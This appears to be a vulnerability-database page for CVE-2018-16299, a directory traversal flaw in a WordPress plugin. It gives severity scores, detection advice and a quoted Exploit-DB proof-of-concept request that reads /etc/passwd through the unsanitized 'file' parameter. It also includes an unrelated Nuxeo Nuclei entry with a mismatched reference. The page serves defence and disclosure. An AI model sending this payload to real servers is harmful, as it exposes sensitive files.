CVE-2018-16299
published 2018-09-24CVE-2018-16299: The Localize My Post plugin 1.0 for WordPress allows Directory Traversal via the ajax/include.php file parameter.
PriorityP265high7.5CVSS 3.0
AVNACLPRNUINSUCHINAN
EXPLOIT
EPSS
43.72%
98.6th percentile
The Localize My Post plugin 1.0 for WordPress allows Directory Traversal via the ajax/include.php file parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| localize_my_post_project | localize_my_post | — | — |
Detection & IOCsextracted from sources · hover to see the quote
url/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd↗
- →Look for GET requests to ajax/include.php with a 'file' parameter containing directory traversal sequences (../../) targeting /etc/passwd or other sensitive files. ↗
- →The vulnerable parameter 'file' is passed directly to PHP include() without sanitization; match on HTTP responses containing 'root:.*:0:0:' to confirm successful LFI exploitation. ↗
- →The exploit requires HTTP/1.0 protocol version to interact with the application; flag anomalous HTTP/1.0 requests to the plugin path. ↗
- ·Vulnerability is specific to Localize My Post plugin version 1.0 for WordPress only; later versions are not confirmed affected. ↗
CVSS provenance
nvdv3.07.5HIGHCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
WordPress Plugin Localize My Post 1.0 - Local File Inclusion
exploitdb·2018-09-19
CVE-2018-16299 WordPress Plugin Localize My Post 1.0 - Local File Inclusion
WordPress Plugin Localize My Post 1.0 - Local File Inclusion
---
# Exploit Title: WordPress Plugin Localize My Post 1.0 - Local File Inclusion
# Author: Manuel Garcia Cardenas
# Date: 2018-09-19
# Software link: https://es.wordpress.org/plugins/localize-my-post/
# CVE: 2018-16299
# DESCRIPTION
# This bug was found in the file: /localize-my-post/ajax/include.php
# include($_REQUEST['file']);
# The parameter "file" it is not sanitized allowing include local files
# To exploit the vulnerability only is needed use the version 1.0 of the HTTP protocol to interact with the application.
# Local File Inclusion POC:
GET /wordpress/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd
Nuclei
Nuxeo <10.3 - Remote Code Execution
nuclei·CVSS 7.5
CVE-2018-16341 [HIGH] Nuxeo <10.3 - Remote Code Execution
Nuxeo <10.3 - Remote Code Execution
Nuxeo prior to version 10.3 is susceptible to an unauthenticated remote code execution vulnerability via server-side template injection.
Template:
id: CVE-2018-16341
info:
name: Nuxeo <10.3 - Remote Code Execution
author: madrobot
severity: high
description: |
Nuxeo prior to version 10.3 is susceptible to an unauthenticated remote code execution vulnerability via server-side template injection.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
remediation: |
Upgrade Nuxeo to version 10.3 or later to mitigate this vulnerability.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2018-16299
classification:
cve-id: CVE-2018-16341
metadata:
max-request: 1
tags: cve,cve2018,nux
Nuclei
WordPress Localize My Post 1.0 - Local File Inclusion
nuclei·CVSS 7.5
CVE-2018-16299 [HIGH] WordPress Localize My Post 1.0 - Local File Inclusion
WordPress Localize My Post 1.0 - Local File Inclusion
WordPress Localize My Post 1.0 is susceptible to local file inclusion via the ajax/include.php file parameter.
Template:
id: CVE-2018-16299
info:
name: WordPress Localize My Post 1.0 - Local File Inclusion
author: 0x_Akoko,0x240x23elu
severity: high
description: |
WordPress Localize My Post 1.0 is susceptible to local file inclusion via the ajax/include.php file parameter.
impact: |
An attacker can exploit this vulnerability to read sensitive files on the server.
remediation: |
Update to the latest version of WordPress Localize My Post plugin.
reference:
- https://www.exploit-db.com/exploits/45439
- https://packetstormsecurity.com/files/149433/WordPress-Localize-My-Post-1.0-Local-File-Inclusion.html
- https://github.com/julianburr/w
http://seclists.org/fulldisclosure/2018/Sep/33https://github.com/julianburr/wp-plugin-localizemypost/issues/1https://packetstormsecurity.com/files/149433/WordPress-Localize-My-Post-1.0-Local-File-Inclusion.htmlhttps://www.exploit-db.com/exploits/45439/http://seclists.org/fulldisclosure/2018/Sep/33https://github.com/julianburr/wp-plugin-localizemypost/issues/1https://packetstormsecurity.com/files/149433/WordPress-Localize-My-Post-1.0-Local-File-Inclusion.htmlhttps://www.exploit-db.com/exploits/45439/
2018-09-24
Published